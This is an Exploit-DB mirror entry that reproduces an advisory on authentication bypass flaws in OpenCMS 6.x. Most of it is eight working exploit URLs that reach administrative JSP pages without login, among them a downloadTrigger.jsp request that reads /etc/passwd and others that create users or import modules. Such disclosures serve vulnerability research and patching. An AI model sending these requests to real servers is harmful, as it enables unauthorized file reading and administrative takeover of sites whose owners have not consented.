bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/jsp/webapps/28278.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

16 lines
No EOL
1.3 KiB
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/19174/info
OpenCMS is prone to multiple unauthorized-access vulnerabilities because it fails to properly authenticate users when performing administrative tasks.
An attacker can exploit these issues to view, delete, and modify application data. This could aid in further attacks on the affected computer.
Versions 6.2.1, 6.2, 6.04, and 6.03 are vulnerable; prior versions may also be affected.
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Fworkplace%2Flogfileview
http://www.example.com/opencms/opencms/system/workplace/admin/workplace/logfileview/downloadTrigger.jsp?filePath=/etc/passwd
http://www.example.com/opencms/opencms/system/workplace/editors/editor.jsp?resource=/index.jsp
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Faccounts%2Fwebusers/new
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp? path=%2Fmodules%2Fmodules_import
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Fdatabase%2Fimporthttp
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Fworkplace%2Fbroadcast
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Faccounts/users
Reference in a new issue View git blame Copy permalink